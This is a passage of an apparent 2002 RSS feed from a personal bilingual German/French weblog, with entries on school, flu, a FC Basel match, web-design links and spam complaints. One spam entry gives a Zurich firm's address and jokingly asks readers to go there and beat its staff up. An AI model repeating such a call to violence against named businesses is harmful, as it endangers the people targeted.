  15260.    <description><![CDATA[<a href=""><b>Einstein's Rätsel</b></a>, das nur 2% der Weltbevölkerung lösen können sollen. Ich hab's geschafft, ich gehör zu den 2 intelligentesten % der Erde ;-)<br><br>via <a href=""><b>e.loge</b></a>
  15261. ]]></description>
  15262.    <content:encoded><![CDATA[<a href=""><b>Einstein's Rätsel</b></a>, das nur 2% der Weltbevölkerung lösen können sollen. Ich hab's geschafft, ich gehör zu den 2 intelligentesten % der Erde ;-)<br><br>via <a href=""><b>e.loge</b></a>
  15263. ]]></content:encoded>
  15264.  </item>
  15266.  <item>
  15267.    <title>Anti-Ads</title>
  15268.    <link></link>
  15269.    <guid isPermaLink="true"></guid>
  15270.    <dc:creator>Andreas Jaggi</dc:creator>
  15271.    <creativeCommons:license></creativeCommons:license>
  15272.    <pubDate>Sun, 17 Nov 2002 22:10:00 +0100</pubDate>
  15273.    <category domain="">Misc</category>
  15274.    <description><![CDATA[Auf <a href=""><b></b></a> gibt es das Anti-Ads-Projekt, welches Parodien verschiedener Werbebanner macht.<br><br><img alt="Monitor Giveaway" src=""><br><br><img alt="Virusalert" src=""><br><br><img alt="Epilepsy" src=""><br><br><img alt="Supportcyberterrorism" src="">
  15275. ]]></description>
  15276.    <content:encoded><![CDATA[Auf <a href=""><b></b></a> gibt es das Anti-Ads-Projekt, welches Parodien verschiedener Werbebanner macht.<br><br><img alt="Monitor Giveaway" src=""><br><br><img alt="Virusalert" src=""><br><br><img alt="Epilepsy" src=""><br><br><img alt="Supportcyberterrorism" src="">
  15277. ]]></content:encoded>
  15278.  </item>
  15280.  <item>
  15281.    <title>Paris</title>
  15282.    <link></link>
  15283.    <guid isPermaLink="true"></guid>
  15284.    <dc:creator>Andreas Jaggi</dc:creator>
  15285.    <creativeCommons:license></creativeCommons:license>
  15286.    <pubDate>Sun, 17 Nov 2002 14:22:00 +0100</pubDate>
  15287.    <category domain="">Misc</category>
  15288.    <description><![CDATA[<a href=""><b></b></a> est une autre website de Paris. Il y a 25 webcams et 240 photos panoramique.<br>Regardez-le!
  15289. ]]></description>
  15290.    <content:encoded><![CDATA[<a href=""><b></b></a> est une autre website de Paris. Il y a 25 webcams et 240 photos panoramique.<br>Regardez-le!
  15291. ]]></content:encoded>
  15292.  </item>
  15294.  <item>
  15295.    <title>Nein ich will eure Kamera-Attrape nicht!</title>
  15296.    <link></link>
  15297.    <guid isPermaLink="true"></guid>
  15298.    <dc:creator>Andreas Jaggi</dc:creator>
  15299.    <creativeCommons:license></creativeCommons:license>
  15300.    <pubDate>Sun, 17 Nov 2002 12:36:00 +0100</pubDate>
  15301.    <category domain="">Misc</category>
  15302.    <description><![CDATA[Business Corporation for W+L. AG, Rautistrasse 71, 8048 Zürich<br><br>Merken die eigentlich nicht, dass sie ihrem Ruf mit dem Spam nur schaden?<br>Ich würde wetten, dass die Erfolgsqoute bei ihren Spam-Angebote unter 1 % liegt!
  15303. ]]></description>
  15304.    <content:encoded><![CDATA[Business Corporation for W+L. AG, Rautistrasse 71, 8048 Zürich<br><br>Merken die eigentlich nicht, dass sie ihrem Ruf mit dem Spam nur schaden?<br>Ich würde wetten, dass die Erfolgsqoute bei ihren Spam-Angebote unter 1 % liegt!
  15305. ]]></content:encoded>
  15306.  </item>
  15308.  <item>
  15309.    <title>Jungbürgerfeier</title>
  15310.    <link></link>
  15311.    <guid isPermaLink="true"></guid>
  15312.    <dc:creator>Andreas Jaggi</dc:creator>
  15313.    <creativeCommons:license></creativeCommons:license>
  15314.    <pubDate>Sun, 17 Nov 2002 12:21:00 +0100</pubDate>
  15315.    <category domain="">Misc</category>
  15316.    <description><![CDATA[Gestern Abend war Jungbürgerfeier und ich habe irgendwelche mystischen Papiere  bekommen.<br>... und nun hab ich Kopfschmerzen.<br>Mehr brauch ich dazu wohl nicht zu sagen ...
  15317. ]]></description>
  15318.    <content:encoded><![CDATA[Gestern Abend war Jungbürgerfeier und ich habe irgendwelche mystischen Papiere  bekommen.<br>... und nun hab ich Kopfschmerzen.<br>Mehr brauch ich dazu wohl nicht zu sagen ...
  15319. ]]></content:encoded>
  15320.  </item>
  15322.  <item>
  15323.    <title>Zur Abwechslung</title>
  15324.    <link></link>
  15325.    <guid isPermaLink="true"></guid>
  15326.    <dc:creator>Andreas Jaggi</dc:creator>
  15327.    <creativeCommons:license></creativeCommons:license>
  15328.    <pubDate>Thu, 14 Nov 2002 23:33:00 +0100</pubDate>
  15329.    <category domain="">Misc</category>
  15330.    <description><![CDATA[<a href=""><b>Hier</b></a> hat es einen aktuellen Screenshots meines Desktops.
  15331. ]]></description>
  15332.    <content:encoded><![CDATA[<a href=""><b>Hier</b></a> hat es einen aktuellen Screenshots meines Desktops.
  15333. ]]></content:encoded>
  15334.  </item>
  15336.  <item>
  15337.    <title>Dune du Pilat</title>
  15338.    <link></link>
  15339.    <guid isPermaLink="true"></guid>
  15340.    <dc:creator>Andreas Jaggi</dc:creator>
  15341.    <creativeCommons:license></creativeCommons:license>
  15342.    <pubDate>Thu, 14 Nov 2002 21:47:00 +0100</pubDate>
  15343.    <category domain="">Misc</category>
  15344.    <description><![CDATA[La Dune du Pilat est la plus haute d'Europe: 117 m.<br>Elle est située à côté du bassin d'Arcachon.<br>J'étais plusieurs fois là et c'ètait chaque fois une impréssion merveilleuse et inoublieable!<br><br>Bon, d'un scan d'une carte postale j'ai fait ce wallpaper <a href=""><b>là</b></a> car j'aime beaucoup cette région.
  15345. ]]></description>
  15346.    <content:encoded><![CDATA[La Dune du Pilat est la plus haute d'Europe: 117 m.<br>Elle est située à côté du bassin d'Arcachon.<br>J'étais plusieurs fois là et c'ètait chaque fois une impréssion merveilleuse et inoublieable!<br><br>Bon, d'un scan d'une carte postale j'ai fait ce wallpaper <a href=""><b>là</b></a> car j'aime beaucoup cette région.
  15347. ]]></content:encoded>
  15348.  </item>
  15350.  <item>
  15351.    <title>A remarquer</title>
  15352.    <link></link>
  15353.    <guid isPermaLink="true"></guid>
  15354.    <dc:creator>Andreas Jaggi</dc:creator>
  15355.    <creativeCommons:license></creativeCommons:license>
  15356.    <pubDate>Thu, 14 Nov 2002 00:29:00 +0100</pubDate>
  15357.    <category domain="">Misc</category>
  15358.    <description><![CDATA[<a href=""><b>ni vu ni connu</b></a> est aussi un blogue bilingue: français - anglais<br>
  15359. <a href=""><b>xtof. Carnet Web.</b></a> traite les outils de publication et d'échange.
  15361. ]]></description>
  15362.    <content:encoded><![CDATA[<a href=""><b>ni vu ni connu</b></a> est aussi un blogue bilingue: français - anglais<br>
  15363. <a href=""><b>xtof. Carnet Web.</b></a> traite les outils de publication et d'échange.
  15365. ]]></content:encoded>
  15366.  </item>
  15368.  <item>
  15369.    <title>Fatiguéant</title>
  15370.    <link></link>
  15371.    <guid isPermaLink="true"></guid>
  15372.    <dc:creator>Andreas Jaggi</dc:creator>
  15373.    <creativeCommons:license></creativeCommons:license>
  15374.    <pubDate>Wed, 13 Nov 2002 23:54:00 +0100</pubDate>
  15375.    <category domain="">School</category>
  15376.    <description><![CDATA[Aujourd'hui je me suis présque endormi en école car je n'ai que dort une heure la dernière nuit. Bon, aux maths en traitait le calcul des probabilités et je devais me dire tout le temps: 'Ne ferme pas tes yeux...' car c'était si ennuyeux ;-)
  15377. ]]></description>
  15378.    <content:encoded><![CDATA[Aujourd'hui je me suis présque endormi en école car je n'ai que dort une heure la dernière nuit. Bon, aux maths en traitait le calcul des probabilités et je devais me dire tout le temps: 'Ne ferme pas tes yeux...' car c'était si ennuyeux ;-)
  15379. ]]></content:encoded>
  15380.  </item>
  15382.  <item>
  15383.    <title>Verhaut die Spammer !!!</title>
  15384.    <link></link>
  15385.    <guid isPermaLink="true"></guid>
  15386.    <dc:creator>Andreas Jaggi</dc:creator>
  15387.    <creativeCommons:license></creativeCommons:license>
  15388.    <pubDate>Wed, 13 Nov 2002 02:54:00 +0100</pubDate>
  15389.    <category domain="">Misc</category>
  15390.    <description><![CDATA[Nein, 'CH - Versandhandel, Albulastrasse 47, 8048 Zürich' ich will deine 'DVD Movie Copy' nicht!<br>Nein, auch nicht wenn du mir auf jeden Mail-Account deine Werbe-Mails in vielfacher ausführung schickst!<br>Nein! Nicht!<br><br>Genausowenig will ich deine Werbe-Mails! Nein, wirklich nicht! Nein! Nicht! Nie!
  15391. ]]></description>
  15392.    <content:encoded><![CDATA[Nein, 'CH - Versandhandel, Albulastrasse 47, 8048 Zürich' ich will deine 'DVD Movie Copy' nicht!<br>Nein, auch nicht wenn du mir auf jeden Mail-Account deine Werbe-Mails in vielfacher ausführung schickst!<br>Nein! Nicht!<br><br>Genausowenig will ich deine Werbe-Mails! Nein, wirklich nicht! Nein! Nicht! Nie!
  15393. ]]></content:encoded>
  15394.  </item>
  15396.  <item>
  15397.    <title>3 : 3</title>
  15398.    <link></link>
  15399.    <guid isPermaLink="true"></guid>
  15400.    <dc:creator>Andreas Jaggi</dc:creator>
  15401.    <creativeCommons:license></creativeCommons:license>
  15402.    <pubDate>Tue, 12 Nov 2002 23:00:00 +0100</pubDate>
  15403.    <category domain="">Misc</category>
  15404.    <description><![CDATA[So lautet das Endresultat des Fussballmatches. Dies bewirkt nun, dass der FC Basel in der Championsleague weiterkommt. Jedoch scheidet damit der FC Liverpool aus. *hehe*<br><br><a href=""><b><span style="color: #ff0000;">F</span><span style="color: #0000FF;">C</span><span style="color: #FF0000;">B</span><span style="color: #0000FF">!</span></b></a>
  15405. ]]></description>
  15406.    <content:encoded><![CDATA[So lautet das Endresultat des Fussballmatches. Dies bewirkt nun, dass der FC Basel in der Championsleague weiterkommt. Jedoch scheidet damit der FC Liverpool aus. *hehe*<br><br><a href=""><b><span style="color: #ff0000;">F</span><span style="color: #0000FF;">C</span><span style="color: #FF0000;">B</span><span style="color: #0000FF">!</span></b></a>
  15407. ]]></content:encoded>
  15408.  </item>
  15410.  <item>
  15411.    <title>Live</title>
  15412.    <link></link>
  15413.    <guid isPermaLink="true"></guid>
  15414.    <dc:creator>Andreas Jaggi</dc:creator>
  15415.    <creativeCommons:license></creativeCommons:license>
  15416.    <pubDate>Tue, 12 Nov 2002 21:55:00 +0100</pubDate>
  15417.    <category domain="">Misc</category>
  15418.    <description><![CDATA[Ach ja, falls jemand eine Website kennt, auf der man Live das laufende Spiel verfolgen könnte, wär's natürlich nett, wenn man sie mir mitteilen würde ;-)
  15419. ]]></description>
  15420.    <content:encoded><![CDATA[Ach ja, falls jemand eine Website kennt, auf der man Live das laufende Spiel verfolgen könnte, wär's natürlich nett, wenn man sie mir mitteilen würde ;-)
  15421. ]]></content:encoded>
  15422.  </item>
  15424.  <item>
  15425.    <title>Spick</title>
  15426.    <link></link>
  15427.    <guid isPermaLink="true"></guid>
  15428.    <dc:creator>Andreas Jaggi</dc:creator>
  15429.    <creativeCommons:license></creativeCommons:license>
  15430.    <pubDate>Tue, 12 Nov 2002 21:52:00 +0100</pubDate>
  15431.    <category domain="">School</category>
  15432.    <description><![CDATA[Wer Informationen in den Fächern Deutsch oder Geschichte sucht, wird auf der <a href=""><b>Website von Roman Looser</b></a> bestimmt fündig.<br><br>Das Zeugs wär ja eigentlich vor allem für Lehrer bestimmt, aber wenn man's auf Internet stellt, muss man damit rechnen, dass es die Schüler finden ;-)
  15433. ]]></description>
  15434.    <content:encoded><![CDATA[Wer Informationen in den Fächern Deutsch oder Geschichte sucht, wird auf der <a href=""><b>Website von Roman Looser</b></a> bestimmt fündig.<br><br>Das Zeugs wär ja eigentlich vor allem für Lehrer bestimmt, aber wenn man's auf Internet stellt, muss man damit rechnen, dass es die Schüler finden ;-)
  15435. ]]></content:encoded>
  15436.  </item>
  15438.  <item>
  15439.    <title>Basel - Liverpool</title>
  15440.    <link></link>
  15441.    <guid isPermaLink="true"></guid>
  15442.    <dc:creator>Andreas Jaggi</dc:creator>
  15443.    <creativeCommons:license></creativeCommons:license>
  15444.    <pubDate>Tue, 12 Nov 2002 21:45:00 +0100</pubDate>
  15445.    <category domain="">Misc</category>
  15446.    <description><![CDATA[Für alle 'normalen' Leute:<br>Heute spielt der FC Basel in der Championsleague gegen den FC Liverpool.<br>'Dramatik' der Situation: Ein Sieg Basels würde Liverpool von der weiteren Championsleague ausschliessen, ein Sieg Liverpools dasselbe mit Basel.<br>Aktueller Stand (nach 1. Halbzeit):<br><b>3 : 0</b> für den FC Basel<br><br>Ein besonderer Gruss hierbei an meine Freunde vor der 'Grossleinwand' im Chemiezimmer. Prost!
  15447. ]]></description>
  15448.    <content:encoded><![CDATA[Für alle 'normalen' Leute:<br>Heute spielt der FC Basel in der Championsleague gegen den FC Liverpool.<br>'Dramatik' der Situation: Ein Sieg Basels würde Liverpool von der weiteren Championsleague ausschliessen, ein Sieg Liverpools dasselbe mit Basel.<br>Aktueller Stand (nach 1. Halbzeit):<br><b>3 : 0</b> für den FC Basel<br><br>Ein besonderer Gruss hierbei an meine Freunde vor der 'Grossleinwand' im Chemiezimmer. Prost!
  15449. ]]></content:encoded>
  15450.  </item>
  15452.  <item>
  15453.    <title>francoblogs</title>
  15454.    <link></link>
  15455.    <guid isPermaLink="true"></guid>
  15456.    <dc:creator>Andreas Jaggi</dc:creator>
  15457.    <creativeCommons:license></creativeCommons:license>
  15458.    <pubDate>Mon, 11 Nov 2002 23:40:00 +0100</pubDate>
  15459.    <category domain="">Misc</category>
  15460.    <description><![CDATA[en blog <a href=""><b></b></a> on trouve aussi des logiciels. p.ex. une horloge transparente.<br>
  15461. <a href=""><b>Geek Grrl</b></a> est le blog d'une femme ordinateuse ;-)<br>
  15462. et le <a href=""><b>bingirl</b></a> est 'Pretty on the inside'
  15463. ]]></description>
  15464.    <content:encoded><![CDATA[en blog <a href=""><b></b></a> on trouve aussi des logiciels. p.ex. une horloge transparente.<br>
  15465. <a href=""><b>Geek Grrl</b></a> est le blog d'une femme ordinateuse ;-)<br>
  15466. et le <a href=""><b>bingirl</b></a> est 'Pretty on the inside'
  15467. ]]></content:encoded>
  15468.  </item>
  15470.  <item>
  15471.    <title>Was für die ganz Harten</title>
  15472.    <link></link>
  15473.    <guid isPermaLink="true"></guid>
  15474.    <dc:creator>Andreas Jaggi</dc:creator>
  15475.    <creativeCommons:license></creativeCommons:license>
  15476.    <pubDate>Mon, 11 Nov 2002 22:08:00 +0100</pubDate>
  15477.    <category domain="">Linux</category>
  15478.    <description><![CDATA[Für die wirklich Harten, wird <a href=""><b></b></a> schon bekannt sein.<br><br>Für alle anderen Harten, gibts <a href=""><b>hier</b></a> harte Sachen wie z.B. dieses <a href=""><b>"WINDOWS FREE ZONE"-Absperrband</b></a> ;-)
  15479. ]]></description>
  15480.    <content:encoded><![CDATA[Für die wirklich Harten, wird <a href=""><b></b></a> schon bekannt sein.<br><br>Für alle anderen Harten, gibts <a href=""><b>hier</b></a> harte Sachen wie z.B. dieses <a href=""><b>"WINDOWS FREE ZONE"-Absperrband</b></a> ;-)
  15481. ]]></content:encoded>
  15482.  </item>
  15484.  <item>
  15485.    <title>Argh</title>
  15486.    <link></link>
  15487.    <guid isPermaLink="true"></guid>
  15488.    <dc:creator>Andreas Jaggi</dc:creator>
  15489.    <creativeCommons:license></creativeCommons:license>
  15490.    <pubDate>Mon, 11 Nov 2002 16:33:00 +0100</pubDate>
  15491.    <category domain="">Misc</category>
  15492.    <description><![CDATA[Verhaut die blöden Spammer!<br><br>CH - Versandhandel, Albulastrasse 47, 8048 Zürich<br>Telefax: 056 - 610 59 46<br>Bestelltelefon: 056 - 610 59 45<br>SMS: 079 - 232 67 88
  15493. ]]></description>
  15494.    <content:encoded><![CDATA[Verhaut die blöden Spammer!<br><br>CH - Versandhandel, Albulastrasse 47, 8048 Zürich<br>Telefax: 056 - 610 59 46<br>Bestelltelefon: 056 - 610 59 45<br>SMS: 079 - 232 67 88
  15495. ]]></content:encoded>
  15496.  </item>
  15498.  <item>
  15499.    <title>Plongez dans l'accessibilité</title>
  15500.    <link></link>
  15501.    <guid isPermaLink="true"></guid>
  15502.    <dc:creator>Andreas Jaggi</dc:creator>
  15503.    <creativeCommons:license></creativeCommons:license>
  15504.    <pubDate>Sun, 10 Nov 2002 21:30:00 +0100</pubDate>
  15505.    <category domain="">Webdesign</category>
  15506.    <description><![CDATA[<a href=""><b>Plongez dans l'accessibilité</b></a> vous guide à faire votre site accessible. Très important!<br>Bon, je sais que mon weblog n'est pas encore accessible, mais je travaille à la vérsion suivante et celle-ci serait vraiment accessible :-)
  15507. ]]></description>
  15508.    <content:encoded><![CDATA[<a href=""><b>Plongez dans l'accessibilité</b></a> vous guide à faire votre site accessible. Très important!<br>Bon, je sais que mon weblog n'est pas encore accessible, mais je travaille à la vérsion suivante et celle-ci serait vraiment accessible :-)
  15509. ]]></content:encoded>
  15510.  </item>
  15512.  <item>
  15513.    <title>Literatur kann lustig sein</title>
  15514.    <link></link>
  15515.    <guid isPermaLink="true"></guid>
  15516.    <dc:creator>Andreas Jaggi</dc:creator>
  15517.    <creativeCommons:license></creativeCommons:license>
  15518.    <pubDate>Sun, 10 Nov 2002 16:42:00 +0100</pubDate>
  15519.    <category domain="">Misc</category>
  15520.    <description><![CDATA[<i>"[...], liebt euch wie die Kaninchen und seid glücklich!"</i><br><br>Dieses Zitat stammt aus <a href=""><b>"Aus dem Leben eines Taugenichts"</b></a> von <a href=""><b>Joseph v. Eichendorff</b></a>
  15521. ]]></description>
  15522.    <content:encoded><![CDATA[<i>"[...], liebt euch wie die Kaninchen und seid glücklich!"</i><br><br>Dieses Zitat stammt aus <a href=""><b>"Aus dem Leben eines Taugenichts"</b></a> von <a href=""><b>Joseph v. Eichendorff</b></a>
  15523. ]]></content:encoded>
  15524.  </item>
  15526.  <item>
  15527.    <title>FR_BLOG</title>
  15528.    <link></link>
  15529.    <guid isPermaLink="true"></guid>
  15530.    <dc:creator>Andreas Jaggi</dc:creator>
  15531.    <creativeCommons:license></creativeCommons:license>
  15532.    <pubDate>Sun, 10 Nov 2002 02:40:00 +0100</pubDate>
  15533.    <category domain="">Webdesign</category>
  15534.    <description><![CDATA[<a href=""><b>FR_BLOG</b></a> c'est une repertoire des weblogs français et francophones.
  15535. ]]></description>
  15536.    <content:encoded><![CDATA[<a href=""><b>FR_BLOG</b></a> c'est une repertoire des weblogs français et francophones.
  15537. ]]></content:encoded>
  15538.  </item>
  15540.  <item>
  15541.    <title>Les standards du W3C</title>
  15542.    <link></link>
  15543.    <guid isPermaLink="true"></guid>
  15544.    <dc:creator>Andreas Jaggi</dc:creator>
  15545.    <creativeCommons:license></creativeCommons:license>
  15546.    <pubDate>Sun, 10 Nov 2002 02:38:00 +0100</pubDate>
  15547.    <category domain="">Webdesign</category>
  15548.    <description><![CDATA[<a href=""><b>Le StandBLog</b></a> traite les standards du <a href=""><b>W3C</b></a>.
  15549. ]]></description>
  15550.    <content:encoded><![CDATA[<a href=""><b>Le StandBLog</b></a> traite les standards du <a href=""><b>W3C</b></a>.
  15551. ]]></content:encoded>
  15552.  </item>
  15554.  <item>
  15555.    <title>Légalisez-le!</title>
  15556.    <link></link>
  15557.    <guid isPermaLink="true"></guid>
  15558.    <dc:creator>Andreas Jaggi</dc:creator>
  15559.    <creativeCommons:license></creativeCommons:license>
  15560.    <pubDate>Sat, 09 Nov 2002 23:34:00 +0100</pubDate>
  15561.    <category domain="">Misc</category>
  15562.    <description><![CDATA[<br><img src="" style="border: 1px solid #000000" alt="chanvre en new york"><br><br>Trouvé dans <a href=""><b>blog de quimbo</b></a>.
  15563. ]]></description>
  15564.    <content:encoded><![CDATA[<br><img src="" style="border: 1px solid #000000" alt="chanvre en new york"><br><br>Trouvé dans <a href=""><b>blog de quimbo</b></a>.
  15565. ]]></content:encoded>
  15566.  </item>
  15568.  <item>
  15569.    <title>Ach menno</title>
  15570.    <link></link>
  15571.    <guid isPermaLink="true"></guid>
  15572.    <dc:creator>Andreas Jaggi</dc:creator>
  15573.    <creativeCommons:license></creativeCommons:license>
  15574.    <pubDate>Sat, 09 Nov 2002 20:34:00 +0100</pubDate>
  15575.    <category domain="">Misc</category>
  15576.    <description><![CDATA[Nun kommt doch so ein Hoschi mit diesem UA-String:<pre>Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; AT&amp;T WNS5.2)</pre>und schon kann ich mein XML-Logfile nicht mehr ansehen, weils nicht mehr Standardkonform ist :-(
  15577. ]]></description>
  15578.    <content:encoded><![CDATA[Nun kommt doch so ein Hoschi mit diesem UA-String:<pre>Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; AT&amp;T WNS5.2)</pre>und schon kann ich mein XML-Logfile nicht mehr ansehen, weils nicht mehr Standardkonform ist :-(
  15579. ]]></content:encoded>
  15580.  </item>
  15582.  <item>
  15583.    <title>Nicht interessant ;-)</title>
  15584.    <link></link>
  15585.    <guid isPermaLink="true"></guid>
  15586.    <dc:creator>Andreas Jaggi</dc:creator>
  15587.    <creativeCommons:license></creativeCommons:license>
  15588.    <pubDate>Sat, 09 Nov 2002 20:31:00 +0100</pubDate>
  15589.    <category domain="">Misc</category>
  15590.    <description><![CDATA[Heut ist ja der 9.11. und wenn man die Zahlen vertauscht ist der ...
  15591. ]]></description>
  15592.    <content:encoded><![CDATA[Heut ist ja der 9.11. und wenn man die Zahlen vertauscht ist der ...
  15593. ]]></content:encoded>
  15594.  </item>
  15596.  <item>
  15597.    <title>Réglage (!!) --></title>
  15598.    <link></link>
  15599.    <guid isPermaLink="true"></guid>
  15600.    <dc:creator>Andreas Jaggi</dc:creator>
  15601.    <creativeCommons:license></creativeCommons:license>
  15602.    <pubDate>Sat, 09 Nov 2002 18:24:00 +0100</pubDate>
  15603.    <category domain="">Coding</category>
  15604.    <description><![CDATA[J'ai changé un peu mon système du weblog. Vous pouvez maintenant changer la langue de la navigation et du contenu, le nombre des entrées montrées. Et si vous faites un commentaire, votre nom, votre e-mail et votre website seraient mémorisés.
  15605. ]]></description>
  15606.    <content:encoded><![CDATA[J'ai changé un peu mon système du weblog. Vous pouvez maintenant changer la langue de la navigation et du contenu, le nombre des entrées montrées. Et si vous faites un commentaire, votre nom, votre e-mail et votre website seraient mémorisés.
  15607. ]]></content:encoded>
  15608.  </item>
  15610.  <item>
  15611.    <title>Einstellungen (!!) --></title>
  15612.    <link></link>
  15613.    <guid isPermaLink="true"></guid>
  15614.    <dc:creator>Andreas Jaggi</dc:creator>
  15615.    <creativeCommons:license></creativeCommons:license>
  15616.    <pubDate>Sat, 09 Nov 2002 18:19:00 +0100</pubDate>
  15617.    <category domain="">Coding</category>
  15618.    <description><![CDATA[ich hab noch mal ein bisschen gebastelt. Rausgekommen ist, dass man nun unter <b>Einstellungen</b> einstellen kann, in welcher Sprache die Navigation erscheinen soll, in welcher Sprache die Inhalte erscheinen sollen und wieviele Einträge auf der Startseite angezeigt werden.<br>Desweiteren werden nun Name, E-Mail und Website beim kommentieren gespeichert.<br>All das funktioniert via ein Cookie, daher bitte aktivieren, wer davon Gebrauch machen möchte.
  15619. ]]></description>
  15620.    <content:encoded><![CDATA[ich hab noch mal ein bisschen gebastelt. Rausgekommen ist, dass man nun unter <b>Einstellungen</b> einstellen kann, in welcher Sprache die Navigation erscheinen soll, in welcher Sprache die Inhalte erscheinen sollen und wieviele Einträge auf der Startseite angezeigt werden.<br>Desweiteren werden nun Name, E-Mail und Website beim kommentieren gespeichert.<br>All das funktioniert via ein Cookie, daher bitte aktivieren, wer davon Gebrauch machen möchte.
  15621. ]]></content:encoded>
  15622.  </item>
  15624.  <item>
  15625.    <title>Blanc</title>
  15626.    <link></link>
  15627.    <guid isPermaLink="true"></guid>
  15628.    <dc:creator>Andreas Jaggi</dc:creator>
  15629.    <creativeCommons:license></creativeCommons:license>
  15630.    <pubDate>Sat, 09 Nov 2002 13:56:00 +0100</pubDate>
  15631.    <category domain="">Misc</category>
  15632.    <description><![CDATA[Il y a de la neige!<br>Il fait très froid et je pense que je ne suis pas encore guéri totelement de la grippe.
  15633. ]]></description>
  15634.    <content:encoded><![CDATA[Il y a de la neige!<br>Il fait très froid et je pense que je ne suis pas encore guéri totelement de la grippe.
  15635. ]]></content:encoded>
  15636.  </item>
  15638.  <item>
  15639.    <title>wb</title>
  15640.    <link></link>
  15641.    <guid isPermaLink="true"></guid>
  15642.    <dc:creator>Andreas Jaggi</dc:creator>
  15643.    <creativeCommons:license></creativeCommons:license>
  15644.    <pubDate>Thu, 07 Nov 2002 23:49:00 +0100</pubDate>
  15645.    <category domain="">Misc</category>
  15646.    <description><![CDATA[Mir gehts wieder besser. Mit dem Schulaufsuchen hats heute auch geklappt ;-)<br><br><a href=""><b>Der Schockwellenreiter</b></a> hat eine neue Programmiersprache <a href=""><b>entdeckt</b></a>: <a href=""><b>Loell</b></a>.<br>Nicht zu vergessen, dass Löl auf Schweizerdeutsch etwa soviel wie Idiot heisst ;-P
  15647. ]]></description>
  15648.    <content:encoded><![CDATA[Mir gehts wieder besser. Mit dem Schulaufsuchen hats heute auch geklappt ;-)<br><br><a href=""><b>Der Schockwellenreiter</b></a> hat eine neue Programmiersprache <a href=""><b>entdeckt</b></a>: <a href=""><b>Loell</b></a>.<br>Nicht zu vergessen, dass Löl auf Schweizerdeutsch etwa soviel wie Idiot heisst ;-P
  15649. ]]></content:encoded>
  15650.  </item>
  15652.  <item>
  15653.    <title>Krank ist krank</title>
  15654.    <link></link>
  15655.    <guid isPermaLink="true"></guid>
  15656.    <dc:creator>Andreas Jaggi</dc:creator>
  15657.    <creativeCommons:license></creativeCommons:license>
  15658.    <pubDate>Wed, 06 Nov 2002 12:00:00 +0100</pubDate>
  15659.    <category domain="">Misc</category>
  15660.    <description><![CDATA[Bin doch nicht in die Schule gegangen, da mein Fieber wieder auf fast 39° gestiegen ist :-(
  15661. ]]></description>
  15662.    <content:encoded><![CDATA[Bin doch nicht in die Schule gegangen, da mein Fieber wieder auf fast 39° gestiegen ist :-(
  15663. ]]></content:encoded>
  15664.  </item>
  15666.  <item>
  15667.    <title>Darniederliegend</title>
  15668.    <link></link>
  15669.    <guid isPermaLink="true"></guid>
  15670.    <dc:creator>Andreas Jaggi</dc:creator>
  15671.    <creativeCommons:license></creativeCommons:license>
  15672.    <pubDate>Tue, 05 Nov 2002 16:53:00 +0100</pubDate>
  15673.    <category domain="">Misc</category>
  15674.    <description><![CDATA[Die Grippe oder was auch immer das war, hatte mich erwischt. Aber jetzt scheints wieder besser zu gehen. Morgen gehe ich auch wieder in die Schule, andere Leute anstecken. *hehe*
  15675. ]]></description>
  15676.    <content:encoded><![CDATA[Die Grippe oder was auch immer das war, hatte mich erwischt. Aber jetzt scheints wieder besser zu gehen. Morgen gehe ich auch wieder in die Schule, andere Leute anstecken. *hehe*
  15677. ]]></content:encoded>
  15678.  </item>
  15680.  <item>
  15681.    <title>Arcachon</title>
  15682.    <link></link>
  15683.    <guid isPermaLink="true"></guid>
  15684.    <dc:creator>Andreas Jaggi</dc:creator>
  15685.    <creativeCommons:license></creativeCommons:license>
  15686.    <pubDate>Sat, 02 Nov 2002 23:18:00 +0100</pubDate>
  15687.    <category domain="">Misc</category>
  15688.    <description><![CDATA[Quand il pleut tout le jour comme aujourd'hui, j'aimerais être <a href=""><b>là</b></a>.
  15689. ]]></description>
  15690.    <content:encoded><![CDATA[Quand il pleut tout le jour comme aujourd'hui, j'aimerais être <a href=""><b>là</b></a>.
  15691. ]]></content:encoded>
  15692.  </item>
  15694.  <item>
  15695.    <title>SPAM 2. !!!</title>
  15696.    <link></link>
  15697.    <guid isPermaLink="true"></guid>
  15698.    <dc:creator>Andreas Jaggi</dc:creator>
  15699.    <creativeCommons:license></creativeCommons:license>
  15700.    <pubDate>Sat, 02 Nov 2002 16:59:00 +0100</pubDate>
  15701.    <category domain="">Misc</category>
  15702.    <description><![CDATA[Wenn wir schon dran sind können wir hier weiterfahren. Ist eben auch noch gerade eine SPAM-Mail gekommen.<br><br>Business Corporation for W+L. AG, Rautistrasse 71, 8048 Zürich
  15703. ]]></description>
  15704.    <content:encoded><![CDATA[Wenn wir schon dran sind können wir hier weiterfahren. Ist eben auch noch gerade eine SPAM-Mail gekommen.<br><br>Business Corporation for W+L. AG, Rautistrasse 71, 8048 Zürich
  15705. ]]></content:encoded>
  15706.  </item>
  15708.  <item>
  15709.    <title>SPAAAAAAAAAAAAAAAAAAM !!!</title>
  15710.    <link></link>
  15711.    <guid isPermaLink="true"></guid>
  15712.    <dc:creator>Andreas Jaggi</dc:creator>
  15713.    <creativeCommons:license></creativeCommons:license>
  15714.    <pubDate>Sat, 02 Nov 2002 16:56:00 +0100</pubDate>
  15715.    <category domain="">Misc</category>
  15716.    <description><![CDATA[Könnte mal jemand aus Zürich hier vorbeigehen und denen mal so ganz tüchtig die Fresse verhauen.<br><br>Fürst E-Marketing, Badenerstr. 653, 8048 Zürich,  Fax: (043) 317 02 85
  15717. ]]></description>
  15718.    <content:encoded><![CDATA[Könnte mal jemand aus Zürich hier vorbeigehen und denen mal so ganz tüchtig die Fresse verhauen.<br><br>Fürst E-Marketing, Badenerstr. 653, 8048 Zürich,  Fax: (043) 317 02 85
  15719. ]]></content:encoded>
  15720.  </item>
  15722.  <item>
  15723.    <title>Der richtige Kaffee</title>
  15724.    <link></link>
  15725.    <guid isPermaLink="true"></guid>
  15726.    <dc:creator>Andreas Jaggi</dc:creator>
  15727.    <creativeCommons:license></creativeCommons:license>
  15728.    <pubDate>Sat, 02 Nov 2002 16:02:00 +0100</pubDate>
  15729.    <category domain="">School</category>
